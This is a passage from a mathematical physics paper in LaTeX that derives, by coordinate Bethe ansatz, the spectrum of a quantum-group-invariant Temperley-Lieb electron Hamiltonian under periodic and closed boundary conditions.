the Yang-Baxter equation through the TL algebra, a
local Hamiltonian can be defined by
(see ref. \cite{cinco} for more details).
\begin{equation}
H_{i,i+1}=T_{i,i+1},
\end{equation}
where on the N-fold tensor product space we denoted
\begin{equation}
T_{i,i+1}=I^{\otimes (i-1)}\otimes T\otimes I^{\otimes (N-i-1)}.
\end{equation}
In view of the grading the basis vectors of the module $V$ can
be identified with the eletronic states as follows
\[
|1\rangle \equiv |+-\rangle = c^+_+c^+_-|0\rangle \ ,
\ |2\rangle \equiv |-\rangle =c^+_-|0\rangle \ , \
|3\rangle \equiv |+\rangle = c^+_+|0\rangle \ ,
\ |4\rangle \equiv | 0\rangle
\]
allowing $H_{i,i+1}$ to be expressed as
\begin{eqnarray}
H_{i,i+1} &=& qn_{i,+}n_{i,-}(1-n_{i+1,+})
(1-n_{i+1,-})+q^{-1}(1-n_{i,+})(1-n_{i,-})n_{i+1,+}n_{i+1,-}
\nonumber \\
&+& q^{-1}n_{i,+}(1-n_{i,-})n_{i+1,-}(1-n_{i+1,+})+
qn_{i,-}(1-n_{i,+})n_{i+1,+}(1-n_{i+1,-})\nonumber \\
&-& S^+_iS^-_{i+1}-S^-_iS^+_{i+1}+
c^+_{i,+}c^+_{i,-}c_{i+1,-}c_{i+1,+}+
c^+_{i+1,+}c^+_{i+1,-}c_{i-}c_{i+}
\\
&+&qc^+_{i,+}c_{i+1,+}n_{i,-}(1-n_{i+1,-}) + h.c.
-c^+_{i,-}c_{i+1,-}n_{i,+}(1-n_{i+1,+}) + h.c.
\nonumber \\
&+& c_{i,-}c^+_{i+1,-}n_{i+1,+}(1-n_{i,+}) + h.c.
-q^{-1} c_{i,+}c^+_{i+1,+}n_{i+1,-}(1-n_{i,-})+h.c.\nonumber
\end{eqnarray}
where the $c^{(+)}_{i\pm}$ are spin up or down annihilation (creation)
operators, the $S'_is$ spin matrices and the $n'_is$ occupation
numbers of electrons at lattice site $i$.
This model describes electron pair hopping,
correlated hopping and generalized spin interactions. In the
limit $q\rightarrow 1$ it reduces to the isotropic Hamiltonian
introduced by Links in \cite{quatro}, which was shown to be
invariant with respect to $ gl(2) \otimes u(1)$.
The global Hamiltonian is given by
\begin{equation}
H=\sum_{k=1}^{N-1} \, H_{k,k+1} \, \, \, + \, \, \, b.t. \label{eq1.1}
\end{equation}
where $b.t.$ denotes the boundary term. The usual imposition of
periodic boundary conditions (PBC),i.e., $ b.t. = H_{N,1}$, has
the effect of breaking the $U_q(gl(2))\otimes u(1)$ symmetry of the
model, since $H_{N,1} \neq H_{1,N}$, reflecting the non-cocommutativity
of the co-product. However, it was shown in \cite{cinco}
following \cite{{martin},{KZ},{grosse},{foercb}} that for a special choice
of the boundary term it is in fact possible to recover
a quantum algebra invariant Hamiltonian which is in addition
periodic in a certain sense. We shall call this type of boundary
by closed one (CBC) and denote it by $b.t. = {\cal U}_{0} $
(see section 4 for details).
In the next sections we will find the spectrum of this Hamiltonian
for these two types of boundaries (PBC and CBC) through a modified
version of the coordinate Bethe ansatz.
\section{Bethe ansatz solution for periodic boundary conditions}
The case with periodic boundary conditions described by the Hamiltonian
\begin{equation}
H=\sum_{k=1}^{N} \, T_{k,k+1}, \label{eqpbc}
\end{equation}
can be mapped into a quantum spin
chain of $N$ sites each with spin $3/2$. To verify this we notice that
the local Hamiltoniancan be rewritten as
\[
T=\left| \Psi \right\rangle \left\langle \Psi \right| =\left(
\begin{array}{ll}
U & {\huge 0}_{4\times 12} \\
{\huge 0}_{12\times 4} & {\Huge 0}_{12\times 12}
\end{array}
\right)
\]
where
\begin{equation}
U=
\begin{array}{l}
\left\langle 14\right| \\
\left\langle 23\right| \\
\left\langle 32\right| \\
\left\langle 41\right|
\end{array}
\left(
\begin{array}{c}
\begin{array}{llll}
\left| 14\right\rangle &
\left| 23\right\rangle &
\left| 32\right\rangle &
\left| 41\right\rangle
\end{array}
\\
\!\!\!\!
\begin{array}{llll}
q \, \, \, & -q \, \, \, \, \, \, & \, \, \, 1 \, \,\,\, \, \, & \, \, \, 1 \\
-q & \, \, \, q\, & -1\, & -1 \\
1 & -1 & q^{-1} & q^{-1} \\
1 & -1 & q^{-1} & q^{-1}
\end{array}
\end{array}
\right) \label{eq0.2}
\end{equation}
and the following correspondence has to be understood
\begin{equation}
\left| 1\right\rangle =\left(
\begin{array}{l}
1 \\
0 \\
0 \\
0
\end{array}
\right) ,\left| 2\right\rangle =\left(
\begin{array}{l}
0 \\
1 \\
0 \\
0
\end{array}
\right) ,\left| 3\right\rangle =\left(
\begin{array}{l}
0 \\
0 \\
1 \\
0
\end{array}
\right) ,\left| 4\right\rangle =\left(
\begin{array}{l}
0 \\
0 \\
0 \\
1
\end{array}
\right) , \label{eq1.2}
\end{equation}
The spin values are given by the eigenvalues of the operator $S^{z}$%
\[
S^{z}=\left(
\begin{array}{llll}
3/2 & & & \\
& 1/2 & & \\
& & -1/2 & \\
& & & -3/2
\end{array}
\right)
\]
and the total spin operator commuting with H is $S_{T}^{z}$
\begin{equation}
S_{T}^{z}=\sum_{k=1}^{N}{I^{\otimes (k-1)}}\otimes S^{z}\otimes
{I^{\otimes (N-k)}}.
\end{equation}
Following \cite{sete} the spectrum of the above Hamiltonian can be
classified in sectors which are defined by the eigenvalues of the operator
number
\begin{equation}
r=\frac{3}{2}N-S_{T}^{z} \label{eq1.3}
\end{equation}
Let us now start to diagonalize $H$ in every sector, i.e.,
\[
H{\cal \ }\Psi =E\Psi
\]
In the first sectors $r=0, 1, 2$ the eigenstates do not move under
the action of $H$, i.e., $ H{\cal \ }\Psi_{r=0, 1, 2} = 0$. For this
reason they are called impurities \cite{rol}.
In sector $r=3$, we
encounter the situation where the states $\left| \alpha ,k\right\rangle $
and $\left| -\alpha ,k\pm 1\right\rangle $, $\alpha \in S^z=\{\frac{-3}{2},%
\frac{-1}{2},\frac{1}{2},\frac{3}{2}\}$, occur in neighboring pairs. They
move under the action of $H$, {\it i.e.,} the sector $r=3$ contains one
free
{\em pseudoparticle}. In general, for a sector $r$ we may have $p$
pseudoparticles and $N_{\frac{1}{2}}$ and $N_{\frac{-1}{2}}$, impurities of
the type $\frac{1}{2}$ and $\frac{-1}{2}$, respectively, such that
\begin{equation}
r=3p+N_{\frac{1}{2}}+2N_{\frac{-1}{2}} \label{pba1}
\end{equation}
For the first nontrivial sector $r=3$, the correspondent eigenspace is spanned
by the states $|k(-\alpha ,\alpha )>=|\frac{3}{2}\ \frac{3}{2}\cdots
\frac{3}{2} {-\alpha }\alpha \ \frac{3}{2}\cdots
\frac{3}{2}>$
, where $k=1,2,...,N-1\ $and{\rm \ }$\ \alpha \in S^z.$
We seek eigenstates of
$H$ which are linear combinations of these vectors. It is very convenient to
consider the linear combination
\begin{equation}
\left| \Omega (k)\right\rangle =\left| k(\frac{-3}{2},\frac{3}{2}
)\right\rangle +\left| k(\frac{-1}{2},\frac{1}{2})\right\rangle -q\left| k(%
\frac{1}{2},\frac{-1}{2})\right\rangle +q\left| k(\frac{3}{2},\frac{-3}{2}%
)\right\rangle \label{pba2}
\end{equation}
which is an eigenstate of $U_{k}$ \footnote{ From now on we will adopt the
convention that $ U_{k} \equiv U_{k,k+1} $ operates in a direct product
of complex spaces at positions $k$ and $k+1$}
\begin{equation}
U_{k}\left| \Omega (k)\right\rangle =(Q+Q^{-1})\left| \Omega
(k)\right\rangle =2(q+q^{-1})\left| \Omega (k)\right\rangle \text{.}
\label{pba3}
\end{equation}
and also a highest weight state, i.e., $ S^+ \Psi = 0$.
Moreover, the action of $U_{k\pm 1}$ on $\left| \Omega (k)\right\rangle $ is
very simple
\begin{equation}
\begin{array}{lll}
U_{k\pm 1}\left| \Omega (k)\right\rangle =\left| \Omega (k\pm
1)\right\rangle & & U_{k}\left| \Omega (k\pm 1)\right\rangle =\left|
\Omega (k)\right\rangle \\
& & \\
U_{k}\left| \Omega (m)\right\rangle =0 & & k\neq \{m\pm 1,m\}
\end{array}
\label{pba4}
\end{equation}
It should be emphasized that the linear combination (\ref{pba2}) affords a
considerable simplification in the diagonalization of $H$ in comparsion
with the traditional calculus employing the usual spin basis \cite{sete}.
In fact, we believe that this type of ansatz is quite general and could
be applied to solve a larger class of Hamiltonians derived from
representations of the TL algebra.
We will now start to diagonalize $H$ in the sector $r=3$. Let us consider
the non-trivial case of one
free pseudoparticle
\begin{equation}
\Psi _{3}=\sum_{k}A(k)\left| \Omega (k)\right\rangle . \label{pba5}
\end{equation}
Using the eigenvalue equation $H${\cal \ }$\Psi _{3}=E_{3}\Psi _{3}$, one
can derive a complete set of equations for the wavefunctions $A(k)$.
When the bulk of $H$ acts on $\left| \Omega (k)\right\rangle $ it sees the
reference configuration, except in the vicinity of $k$ where we use (\ref
{pba3}) and (\ref{pba4}) to get the following eigenvalue equation
\begin{eqnarray}
(E_{3}-Q-Q^{-1})A(k) &=&A(k-1)+A(k+1) \nonumber \\
2 &\leq &k\leq N-2 \label{pba7}
\end{eqnarray}
Here we will treat periodic boundary conditions . They demand $%
U_{N,N+1}=U_{N,1}$, implying $A(k+N)=A(k)$. This permits us to complete
the
set of equations (\ref{pba7}) for $A(k)$ by including the equations for $k=1$
and $k=N-1$. Now we parametrize $A(k)$ by plane wave $A(k)=A\xi ^{k}$ to
get
the energy of one free pseudoparticle as:
\begin{eqnarray}
E_{3} &=&2(q+q^{-1})+\xi +\xi ^{-1} \nonumber \\
\xi ^{N} &=&1 \label{pba8}
\end{eqnarray}
Here $\xi ={\rm e}^{i\theta }$, $\theta $ being the momenta determined from
the periodic boundary to be $\theta =2\pi l/N$, with $l$ an integer.
Let us consider the state with one pseudoparticle and one impurity of type $%
\frac{1}{2}$, which lies in the sector $r=4$. We seek eigenstates in the form
\begin{equation}
\Psi _{4}(\xi _{1},\xi _{2})=\sum_{k_{1}<k_{2}}\left\{
A_{1}(k_{1},k_{2})\left| \Omega _{1}(k_{1},k_{2})\right\rangle
+A_{2}(k_{1},k_{2})\left| \Omega _{2}(k_{1},k_{2})\right\rangle \right\}
\label{pba9}
\end{equation}
We try to build these eigenstates out of translationally invariant products
of one pseudoparticle excitation with parameter $\xi _{2}$ and one impurity
with parameter $\xi _{1}$:
\begin{equation}
\Psi _{4}(\xi _{1},\xi _{2})=\left| \frac{1}{2}(\xi _{1})\right\rangle
\times \Psi _{3}(\xi _{2})+\Psi _{3}(\xi _{2})\times \left| \frac{1}{2}(\xi
_{1})\right\rangle \label{pba9a}
\end{equation}
Using one-pseudoparticle eigenstate solution (\ref{pba5}) and comparing this
with (\ref{pba9}) we get
\begin{eqnarray}
\left| \Omega _{1}(k_{1},k_{2})\right\rangle &=&\left| k_{1}(\frac{1}{2}%
),k_{2}(\frac{-3}{2},\frac{3}{2})\right\rangle +\left| k_{1}(\frac{1}{2}%
),k_{2}(\frac{-1}{2},\frac{1}{2})\right\rangle \nonumber \\
&&-q\left| k_{1}(\frac{1}{2}),k_{2}(\frac{1}{2},\frac{-1}{2})\right\rangle
+q\left| k_{1}(\frac{1}{2}),k_{2}(\frac{3}{2},\frac{-3}{2})\right\rangle
\nonumber \\
&& \nonumber \\
\left| \Omega _{2}(k_{1},k_{2})\right\rangle &=&\left| k_{1}(\frac{-3}{2},%
\frac{3}{2}),k_{2}(\frac{1}{2})\right\rangle +\left| k_{1}(\frac{-1}{2},%
\frac{1}{2}),k_{2}(\frac{1}{2})\right\rangle \nonumber \\
&&-q\left| k_{1}(\frac{1}{2},\frac{-1}{2}),k_{2}(\frac{1}{2})\right\rangle
+q\left| k_{1}(\frac{3}{2},\frac{-3}{2}),k_{2}(\frac{1}{2})\right\rangle
\nonumber \\
&& \label{pba10}
\end{eqnarray}
and
\begin{equation}
A_{1}(k_{1},k_{2})=A_{1}\xi _{1}^{k_{1}}\xi _{2}^{k_{2}}\qquad ,\qquad
A_{2}(k_{1},k_{2})=A_{2}\xi _{2}^{k_{1}}\xi _{1}^{k_{2}}. \label{pba12}
\end{equation}
Periodic boundary conditions $A_{1}(k_{2},N+k_{1})=A_{2}(k_{1},k_{2})$ and $%
A_{i}(N+k_{1},N+k_{2})=A_{i}(k_{1},k_{2})$,\quad $i=1,2$ imply that
\begin{equation}
A_{1}\xi _{2}^{N}=A_{2}\quad ,\quad \xi ^{N}=(\xi _{1}\xi _{2})^{N}=1\
\label{pba13}
\end{equation}
When $H$ now acts on $\Psi _{4}$, we will get a set of coupled equations for
$A_{i}(k_{1},k_{2}),$ $i=1,2$. We split the equations into {\em far}
equations, when the pseudoparticle do not meet the impurity and {\em near}
equations, containing terms when they are neighbors.
Since the impurity is annihilated by $H$, the action of $H$ on (\ref{pba9})
in the case {\em far} ({\it i.e}., $(k_{2}-k_{1})\geq 3$), can be writen down
directly from (\ref{pba7}) :
\begin{equation}
\left( E_{4}-Q-Q^{-1}\right)
A_{1}(k_{1},k_{2})=A_{1}(k_{1},k_{2}-1)+A_{1}(k_{1},k_{2}+1) \label{pba15}
\end{equation}
and similar equations for $A_{2}(k_{1},k_{2})$. Using the parametrization (%
\ref{pba12}), these equations will give us the energy eigenvalues
\begin{equation}
E_{4}=Q+Q^{-1}+\xi _{2}+\xi _{2}^{-1} \label{pba16}
\end{equation}
To find $\xi _{2}$ we must consider the{\em \ near} equations. First, we
compute the action of $H$ on the coupled {\em near} states $\left| \Omega
_{1}(k,k+1)\right\rangle $ and $\left| \Omega _{2}(k,k+2)\right\rangle $:
\begin{eqnarray}
H\left| \Omega _{1}(k,k+1)\right\rangle &=&(Q+Q^{-1})\left| \Omega
_{1}(k,k+1)\right\rangle +\left| \Omega _{1}(k,k+2)\right\rangle -\left|
\Omega _{2}(k,k+2)\right\rangle \nonumber \\
&& \label{pba17}
\end{eqnarray}
The last terms in these equations tell us that a pseudoparticle can
propagate past the isolated impurity, but in doing so causes a shift in its
position by two lattice sites. Substituting (\ref{pba17}) into the eigenvalue
equation, we get
\begin{equation}
\left( E_{4}-Q-Q^{-1}\right) A_{1}(k,k+1)=A_{1}(k,k+2)-A_{2}(k,k+2)
\label{pba20}
\end{equation}
These equations, which are not automatically satisfied by the ansatz (\ref
{pba12}), are equivalent to the conditions
\begin{equation}
A_{1}(k,k) = -A_{2}(k,k+2)\qquad \label{pba21}
\end{equation}
obtained by subtracting Eq. (\ref{pba20}) from Eq.(\ref{pba15}) for $k_{1}=k$
$,$ $k_{2}=k+1$. The conditions (\ref{pba21}) require a modification of the
amplitude relation (\ref{pba13}):
\begin{equation}
\frac{A_{2}}{A_{1}}=-\xi _{1}^{-2}=\xi _{2}^{N}\Rightarrow \xi _{2}^{N}\xi
_{1}^{2}=-1\qquad \text{{\rm or}\qquad }\xi _{2}^{N-2}\xi ^{2}=-1
\label{pba22}
\end{equation}
In the sectors $3<r<6$ we also will find states, which consist of one
pseudoparticle with parameter $\xi _{r-2}$ interacting with $r-3$
impurities, distributing according to (\ref{pba1}), with parameters $\xi
_{i},i=1,2...,r-3$.
The energy of these states is parametrized as in (\ref{pba16}) and $\xi
_{r-2}$ satisfies the condition (\ref{pba22}) with $\xi =\xi _{1}\cdots \xi
_{r-3}\ \xi _{r-2}$. It involves only $\xi _{r-2}$ and $\xi _{{\rm imp}}=\xi
_{1}\ \xi _{2}\cdots \xi _{r-3}$, being therefore highly degenerate, {\it %
i.e.}
\begin{equation}
\xi _{r-2}^{N}\xi _{1}^{2}\ \xi _{2}^{2}\cdots \xi _{r-3}^{2}=(-1)^{r-3}
\label{pba24}
\end{equation}
This is to be expected due to the irrelevance of the relative distances, up
to jumps of two positions via exchange with a pseudoparticle. Moreover,
these results do not depend on the impurity type.
The sector $r=6$ contains, in addition to the cases discussed above, states
which consist of two interacting pseudoparticles. We seek eigenstates in the
form
\begin{equation}
\Psi _{6}(\xi _{1},\xi _{2})=\sum_{k_{1}+1<k_{2}}A(k_{1},k_{2})\left| \Omega
(k_{1},k_{2})\right\rangle \label{pba25}
\end{equation}
Applying $H$ to the state of (\ref{pba25}), we obtain a set of equations for
the wavefunctions $A(k_{1},k_{2})$. When the two pseudoparticles are
separated, ($k_{2}-k_{1}\geq 3$) these are the following {\em far}
equations:
\begin{equation}
\begin{array}{lll}
\left( E_{6}-2Q-2Q^{-1}\right) A(k_{1},k_{2}) & = &
A(k_{1}-1,k_{2})+A(k_{1}+1,k_{2}) \\
& & \\
& + & A(k_{1},k_{2}-1)+A(k_{1},k_{2}+1)
\end{array}
\label{pba30}
\end{equation}
We already know them to be satisfied, if we parametrize $A(k_{1},k_{2})$ by
plane waves (\ref{pba12}). The corresponding energy eigenvalue is
\begin{equation}
E_{6}=2Q+2Q^{-1}+\xi _{1}+\xi _{1}^{-1}+\xi _{2}+\xi _{2}^{-1} \label{pbfa31}
\end{equation}
The real problem arises of course, when pseudoparticles are neighbors, so
that they interact and we have no guarantee that the total energy is a sum of
single pseudoparticle energies.
Acting of $H$ on the state $\left| \Omega (k,k+2)\right\rangle $ gives the
following set of equations for the {\em near} states
\begin{equation}
\begin{array}{lll}
H\left| \Omega (k,k+2)\right\rangle & = & 2\left( Q+Q^{-1}\right) \left|
\Omega (k,k+2)\right\rangle +\left| \Omega (k-1,k+2)\right\rangle \\
& & \\
& + & \left| \Omega (k,k+3)\right\rangle +U_{k+1}\left| \Omega
(k,k+2)\right\rangle
\end{array}
\label{pba32}
\end{equation}
Before we substitute this result into the eigenvalue equation, we observe
that some new states are appearing. In order to incorporate these new states
in the eigenvalue problem, we define
\begin{equation}
U_{k+1}\left| \Omega (k,k+2)\right\rangle = \left| \Omega
(k,k+1)\right\rangle +\left| \Omega (k+1,k+2)\right\rangle \label{pba33}
\end{equation}
Here we underline that we are using the same notation for these new states.
Applying $H$ to them we obtain
\begin{equation}
\begin{array}{lll}
H\left| \Omega (k,k+1)\right\rangle & = & \left( Q+Q^{-1}\right) \left|
\Omega (k,k+1)\right\rangle +\left| \Omega (k-1,k+1)\right\rangle \\
& & \\
& + & \left| \Omega (k,k+2)\right\rangle
\end{array}
\label{pba34}
\end{equation}
Now, we extend (\ref{pba25}), the definition of $\Psi _{6}$ , to
\begin{equation}
\Psi _{6}(\xi _{1},\xi _{2})=\sum_{k_{1}<k_{2}}A(k_{1},k_{2})\left| \Omega
(k_{1},k_{2})\right\rangle \label{pba35}
\end{equation}
Substituting (\ref{pba32}) and (\ref{pba34}) into the eigenvalue equation,
we obtain the following set of {\em near} equations
\begin{equation}
\left( E_{6}-Q-Q^{-1}\right) A(k,k+1)=A(k-1,k+1)+A(k,k+2) \label{pba36}
\end{equation}
Using the same plane wave parametrization for these new wavefunctions, the
equation (\ref{pba36}) gives us the {\em phase shift} produced by the
interchange of the two interacting pseudoparticles
\begin{equation}
\frac{A_{21}}{A_{12}}=-\frac{1+\xi +(Q+Q^{-1})\xi _{2}}{1+\xi +(Q+Q^{-1})=
\xi
_{1}} \label{pba37}
\end{equation}
We thus arrive to the (BAE) which fix the values of $\xi
_{1}$ and $\xi _{2}$ in the energy equation (\ref{pbfa31})
\begin{eqnarray}
\xi _{2}^{N} &=&-\frac{1+\xi +(Q+Q^{-1})\xi _{2}}{1+\xi +(Q+Q^{-1})\xi _{=
1}}
\nonumber \\
\xi ^{N} &=&(\xi _{1}\xi _{2})^{N}=1 \label{pba38}
\end{eqnarray}
In a generic sector $r$ with $l$ impurities parametrized by $\xi _{1}\xi
_{2}\cdots \xi _{l}$ and $p$ pseudoparticles with parameters $\xi _{l+1}\xi
_{l+2}\cdots \xi _{l+p}$, the energy is
\begin{equation}
E_{r}=\sum_{n=l+1}^{p}\left\{ Q+Q^{-1}+\xi _{n}+\xi _{n}^{-1}\right\}
\label{pba59}
\end{equation}
with $\xi _{n}$ determined by the Bethe ansatz equations
\begin{eqnarray}
\xi _{a}^{N}\xi _{1}^{2}\xi _{2}^{2}\cdots \xi _{l}^{2}
&=&(-1)^{l}\prod_{b\neq a=l+1}^{p}\left\{ -\frac{1+\xi _{b}\xi
_{a}+(Q+Q^{-1})\xi _{a}}{1+\xi _{a}\xi _{b}+(Q+Q^{-1})\xi _{b}}\right\}
\nonumber \\
a &=&l+1,l+2,...,l+p,\qquad p\geq 2 \nonumber \\
\xi _{l+1}^{N}\xi _{1}^{2}\xi _{2}^{2}\cdots \xi _{l}^{2} &=&(-1)^{l},\qquad
p=1 \nonumber \\
\xi _{c}^{N-2p} &=&(-1)^{p},\quad c=1,2,...,l \nonumber \\
\xi ^{N} &=&1,\qquad \xi =\xi _{1}\xi _{2}\cdots \xi _{l}\xi _{l+1}\xi
_{l+2}\cdots \xi _{l+p}. \label{pba60}
\end{eqnarray}
The energy eigenvalues and the Bethe equations depend on the deformation
parameter $q$, through the relation $Q+Q^{-1}=2q+2q^{-1}$.
\section{Bethe ansatz solution for closed boundary conditions}
The quantum group invariant closed TL Hamiltonians which can be written
as \cite{cinco}:
\begin{equation}
H=\sum_{k=1}^{N-1}U_{k}+{\cal U}_{0} \label{cbah}
\end{equation}
where $U_{k}$ is a Temperley-Lieb operator and ${\cal U}_{0}$ is a boundary
term defined through of a operator $G$ which plays the role of the
translation operator
\begin{equation}
{\cal U}_{0}=GU_{N-1}G^{-1}\quad ,\quad G=(Q-U_{1})(Q-U_{2})\cdots
(Q-U_{N-1}) \label{cba1}
\end{equation}
satisfying $[H,G]=0$ and additionally invariance with respect to the
quantum
algebra. The operator $G$ shifts the $U_{k}$ by one unit $%
GU_{k}G^{-1}=U_{k+1}$ and maps ${\cal U}_{0}$ into $U_{1}$, which manifest
the translational invariance of $H$. In this sense the Hamiltonian (\ref{cbah}) is
periodic. From the physical point of view, this type of models
exhibit behavior similar to closed chains with twisted boundary conditions
(see for example \cite{pal2} for the case of the XXZ chain).
The action of the operator $G$ on the states $\left| \Omega (k)\right\rangle
$ can be easily computed using (\ref{pba2}), (\ref{pba3}) and
(\ref{pba4}): It is simple on the bulk and at
the left boundary
\begin{equation}
G\left| \Omega (k)\right\rangle =-Q^{N-2}\ \left| \Omega (k+1)\right\rangle
{\rm \quad },{\rm \quad }1\leq k\leq N-2 \label{cba5}
\end{equation}
but has a non-trivial contribution at the right boundary
\begin{equation}
G\left| \Omega (N-1)\right\rangle =Q^{N-2}\sum_{k=1}^{N-1}(-Q)^{-k}\ \left|
\Omega (N-k)\right\rangle \label{cba6}
\end{equation}
Similarly, the action of the operator $G^{-1}=(Q^{-1}-U_{N-1})\cdots
(Q^{-1}-U_{1})$ is simple on the bulk and at the right boundary
\begin{equation}
G^{-1}\left| \Omega (k)\right\rangle =-Q^{-N+2}\left| \Omega
(k-1)\right\rangle \ \quad ,\quad 2\leq k\leq N-1 \label{cba7}
\end{equation}
and non-trivial at the left boundary
\begin{equation}
G^{-1}\left| \Omega (1)\right\rangle =Q^{-N+2}\sum_{k=1}^{N-1}(-Q)^{k}\
\left| \Omega (k)\right\rangle . \label{cba8}
\end{equation}
Now we proceed the diagonalization of $H$ as was made for the periodic case.
As (\ref{cbah}) and (\ref{eq1.1}) have the same bulk,{\it \ i.e.},
differences arise from the boundary terms only, we will keep all
results relating
to the bulk of the periodic case presented in the previous section.
Let us consider one free pseudoparticle which lies in the sector $r=3$
\begin{equation}
\Psi _{3}=\sum_{k=1}^{N-1}A(k)\left| \Omega (k)\right\rangle .
\label{cba9}
\end{equation}
The action of the operator ${\cal U}=\sum_{k=1}^{N-1}U_{k}$ on the states $%
\left| \Omega (k)\right\rangle $ is:
\begin{eqnarray}
{\cal U}\left| \Omega (1)\right\rangle &=&(Q+Q^{-1})\left| \Omega
(1)\right\rangle +\left| \Omega (2)\right\rangle \nonumber \\
{\cal U}\left| \Omega (k)\right\rangle &=&(Q+Q^{-1})\left| \Omega
(k)\right\rangle +\left| \Omega (k-1)\right\rangle +\left| \Omega
(k+1)\right\rangle \nonumber \\
\qquad \quad \text{{\rm for }\ }2 &\leq &k\leq N-2 \nonumber \\
{\cal U}\left| \Omega (N-1)\right\rangle &=&(Q+Q^{-1})\left| \Omega
(N-1)\right\rangle +\left| \Omega (N-2)\right\rangle . \label{cba10}
\end{eqnarray}
and using (\ref{cba5})--(\ref{cba8}) one can see that the action of ${\cal U}%
_{0}=GU_{N-1}G^{-1}$ vanishes on the bulk
\begin{equation}
{\cal U}_{0}\left| \Omega (k)\right\rangle =0\quad ,\quad 2\leq k\leq N-2
\label{cba13}
\end{equation}
and has the following contributions at the boundaries
\begin{equation}
{\cal U}_{0}\left| \Omega (1)\right\rangle =-\sum_{k=1}^{N-1}\ (-Q)^{k}\
\left| \Omega (k)\right\rangle ,\quad {\cal U}_{0}\left| \Omega
(N-1)\right\rangle =-\sum_{k=1}^{N-1}\ (-Q)^{-N+k}\ \left| \Omega
(k)\right\rangle . \label{cba14}
\end{equation}
which are connected by
\begin{equation}
{\cal U}_{0}\left| \Omega (N-1)\right\rangle =(-Q)^{-N}\ {\cal U}_{0}\left|
\Omega (1)\right\rangle . \label{cba15}
\end{equation}
Before we substitute these results into the eigenvalue equation, we will
define two new states
\begin{equation}
\left| \Omega (0)\right\rangle ={\cal U}_{0}\left| \Omega (1)\right\rangle
,\quad \ \left| \Omega (N)\right\rangle ={\cal U}_{0}\left| \Omega
(N-1)\right\rangle \label{cba16}
\end{equation}
to include the cases $k=0$ and $k=N$ into the definition of $\Psi _{3}$,
equation (\ref{cba9}). Finally, the action of $H={\cal U}+{\cal U}_{0}$ on
the states $\left| \Omega (k)\right\rangle $ is
\begin{eqnarray}
H\left| \Omega (0)\right\rangle &=&(Q+Q^{-1})\left| \Omega (0)\right\rangle
+(-Q)^{N}\left| \Omega (N-1)\right\rangle +\left| \Omega (1)\right\rangle
\nonumber \\
&& \nonumber \\
H\left| \Omega (N)\right\rangle &=&(Q+Q^{-1})\left| \Omega (N)\right\rangle
+\left| \Omega (N-1)\right\rangle +(-Q)^{-N}\left| \Omega (1)\right\rangle
\label{cba17}
\end{eqnarray}
Substituting these results into the eigenvalue equation\ $H\Psi _{3}=E_{3}\
\Psi _{3}$ we get a complete set of eigenvalue equations for the
wavefunctions
\begin{eqnarray}
E_{3}\ A(k) &=&(Q+Q^{-1})A(k)+A(k-1)+A(k+1) \nonumber \\
\quad \qquad \text{{\rm for }}1 &\leq &k\leq N-1 \label{cba18}
\end{eqnarray}
provided the following boundary conditions
\begin{equation}
(-Q)^{N}A(k)=A(N+k)\text{ } \label{cba20}
\end{equation}
are satisfied.
The plane wave parametrization $A(k)=A\xi ^{k}$ solves these eigenvalue
equations and the boundary conditions provided that:
\begin{eqnarray}
E_{3} &=&Q+Q^{-1}+\xi +\xi ^{-1}\quad \nonumber \\
\xi ^{N} &=&(-Q)^{N} \label{cba21}
\end{eqnarray}
where $\xi ={\rm e}^{i\theta }$ and $\theta $ being the momentum.
Let us now consider the sector $r=6$, where we can find an eigenstate with
two interacting pseudoparticles. We seek the corresponding eigenfunction as
products of single pseudoparticles eigenfunctions, {\it i.e}.
\begin{equation}
\Psi _{6}=\sum_{k_{1}+1<k_{2}}A(k_{1},k_{2})\left| \Omega
(k_{1},k_{2})\right\rangle \label{cba22}
\end{equation}
To solve the eigenvalue equation $H\Psi _{6}=E_{6}\Psi _{6}$, we recall
(\ref{pba4}) to get the action of ${\cal U}$ and ${\cal U}_{0}$ on the states $%
\left| \Omega (k_{1},k_{2})\right\rangle $. Here we have to consider four
cases: ({\it i})\ when the two pseudoparticles are separated in the bulk,
the action of ${\cal U}$ is
\begin{eqnarray}
{\cal U}\left| \Omega (k_{1},k_{2})\right\rangle &=&2(Q+Q^{-1})\left|
\Omega (k_{1},k_{2})\right\rangle +\left| \Omega
(k_{1}-1,k_{2})\right\rangle +\left| \Omega (k_{1}+1,k_{2})\right\rangle
\nonumber \\
&&+\left| \Omega (k_{1},k_{2}-1)\right\rangle +\left| \Omega
(k_{1},k_{2}+1)\right\rangle \label{cba24}
\end{eqnarray}
i.e., for $k_{1}$ $\geq 2$ and $k_{1}+3\leq k_{2}\leq N-2$; ({\it ii}) when
the two pseudoparticles are separated but one of them or both are at the
boundaries
\begin{eqnarray}
{\cal U}\left| \Omega (1,k_{2})\right\rangle &=&2(Q+Q^{-1})\left| \Omega
(1,k_{2})\right\rangle +\left| \Omega (2,k_{2})\right\rangle +\left| \Omega
(1,k_{2}-1)\right\rangle \nonumber \\
&&+\left| \Omega (1,k_{2}+1)\right\rangle \label{cba25}
\end{eqnarray}
\begin{eqnarray}
{\cal U}\left| \Omega (k_{1},N-1)\right\rangle &=&2(Q+Q^{-1})\left| \Omega
(k_{1},N-1)\right\rangle +\left| \Omega (k_{1}-1,N-1)\right\rangle
\nonumber \\
&&+\left| \Omega (k_{1}+1,N-1)\right\rangle +\left| \Omega
(k_{1},N-2)\right\rangle \label{cba26}
\end{eqnarray}
\begin{equation}
{\cal U}\left| \Omega (1,N-1)\right\rangle =2(Q+Q^{-1})\left| \Omega
(1,N-1)\right\rangle +\left| \Omega (2,N-1)\right\rangle +\left| \Omega
(1,N-2)\right\rangle \label{ba27}
\end{equation}
where $2\leq k_{1}\leq N-4$ and $4\leq k_{2}\leq N-2$; ({\it iii}) when the
two pseudoparticles are neighbors in the bulk
\begin{eqnarray}
{\cal U}\left| \Omega (k,k+2)\right\rangle &=&2(Q+Q^{-1})\left| \Omega
(k,k+2)\right\rangle +\left| \Omega (k-1,k+2)\right\rangle +\left| \Omega
(k,k+3)\right\rangle \nonumber \\
&&+U_{k+1}\left| \Omega (k,k+2)\right\rangle \label{cba28}
\end{eqnarray}
for $2\leq k\leq N-4$ and ({\it iv}) when the two pseudoparticles are
neighbors and at the boundaries
\begin{equation}
{\cal U}\left| \Omega (1,3)\right\rangle =2(Q+Q^{-1})\left| \Omega
(1,3)\right\rangle +\left| \Omega (1,4)\right\rangle +U_{2}\left| \Omega
(1,3)\right\rangle \label{cba29}
\end{equation}
\begin{eqnarray}
